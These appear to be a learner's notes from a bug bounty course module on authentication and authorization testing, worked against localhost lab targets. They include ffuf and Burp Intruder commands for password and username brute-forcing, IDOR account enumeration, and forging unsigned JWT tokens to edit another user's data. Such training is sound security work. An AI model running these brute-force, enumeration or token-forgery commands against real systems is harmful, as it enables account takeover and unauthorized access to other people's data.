Practical Bug Bounty — TCM Academy | Module 6

1- Introduction to Authentication

Authentication is a critical asset in applications. They’re interesting as well to hunt/research for. Authenticaion means your identity, you go to airport show your passport and then they allow you to go; this is authentication. Authorization means what you’re allowed to do. We will start to attack with bruteforce and login issues.

2- Brute-force Attacks

We start by brute-forcing attacks.

Steps:

Instead of manually trying different passwords automate the process with burpsuite.Intercept the login request and send it to intruder.Highlight the password and click a button ADD on your right side.Add a password list in payload options. (use seclists: passwors | path /usr/share/wordlists/seclists/password/xato-net-10-million-passwords-10000.txt)Use an open-source tool for btrute forcing but first copy the intercepted login request to a file.Replace password in file with the word FUZZ and run the command belowffuf -request FILE_NAME.txt -request-proto http -w /usr/share/wordlists/seclists/password/xato-net-10-million-passwords-10000.txtffuf -request FILE_NAME.txt -request-proto http -w /usr/share/wordlists/seclists/password/xato-net-10-million-passwords-10000.txt -fs 1814

3- Attacking MFA

In MFA, keep an eye on the code; lets say the code seems weak or even if not weak, think like is this code re-usable? does it expire?

Steps:

Intercept the request.While sending the request simply remove previous user with another user and you might get logged-in.

4- Authentication Challenge Walkthrough

In this challenge, we have to brute-force and get logged-in. The interesting thing here is after 5 wrong login attempts, our account will be locked.

Steps:

Intercept request and send it to intruder.Highlight what is after username like username=HIGHLIGHT and password=HIGHLIGHTAdd both and choose cluster bomb attack.You will get logged in.Copy intercepted request to a file to use with ffuf.ffuf -request file.txt -request-proto http -mode clusterbomb -w /WORDLIST:FUZZUSER -w /WORDLIST:FUZZPASSffuf -request req.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSER -w passwords.txt:FUZZPASS -mr “Successfully”

5- Introduction to Authorization

A vertical access control will prevent a customer from accessing administrative controlls on an ecommerce websites to edit a product. A horizontal access control will prevent users from modiying other user’s detailals and data. A context dependent access allows access based on the application current state.

6- IDOR

Whenever we see something like /labs/e0x02.php?account=1000 in a url, the first thing we should try is to manipulate the url manually and using automated tools like burp or ffuf.

Steps (burp):

Highlight the ID’s → send to intruder → add a list of password → start attack and analyse requests.

Steps (ffuf):

ffuf -u ‘http://localhost/labs/e0x02.php?account=FUZZ' -w list.txt -mr ‘admin’As you can see we got three accounts starting from 1008 to 1014, verify these and in our case we got admin details.

7- API

Typically we send a request to API and we get data back in-return. So basically instead of the website returning HTML page etc. it just sends-back requested data. Applications will be communicating with API’s in background, so make sure it analyze your burpsuite history.

Steps:

curl https://catfact.ninja/breedcurl — proxy http://localhost:8080 https://catfact.ninja/breeds -kcurl -X PUT — proxy http://localhost:8080 https://catfact.ninja/breeds -k -d ‘{name:”cheese cat”}’curl -X POST -H “Content-Type: application/json” -d ‘{”username”: “jeremy”, “password”: “cheesecake”}’ http://localhost/labs/api/login.phpDecode the JWT token (First part is header, 2nd is content, third is signature)echo ‘eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=’ | base64 -dGetting details by sending GET request.curl -X GET “http://localhost/labs/api/account.php?token=JWT_TOKEN”Posting and trying to modify data.curl -X PUT -H “Content-Type: application/json” -d ‘{“token”:”eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=”,”username”: “jeremy”, “role”: “admin”,”bio”:”Was a Java dev, Now admin”}’ http://localhost/labs/api/account.phpVerifying the modified changecurl -X GET “http://localhost/labs/api/account.php?token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0="

Cmd:

Account 1: curl -X GET “http://localhost/labs/api/account.php?token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0="{“username”:”jeremy”,”role”:”staff”,”bio”:”Was a Java dev, Now admin”}Account 2: curl -X GET “http://localhost/labs/api/account.php?token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVzc2FteSIsInJvbGUiOiJhZG1pbiJ9."{“username”:”jessamy”,”role”:”admin”,”bio”:”Security engineer.”}Changed jessamy bio using jerramy’s token/credentials: curl -X PUT -H “Content-Type: application/json” -d ‘{“token”:”eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=”,”username”: “jeremy”, “role”: “admin”,”bio”:”jessamy hacked lol!”}’ http://localhost/labs/api/account.php

8- Testing with Autorize

Cmd:

curl -X PUT — proxy localhost:8080 “Content-Type: application/json” -b “session=JWT_TOKEN” -d ‘{”username”:”jeremy”,”bio”:”new bio”}’ http://localhost/labs/api/v2/account2.php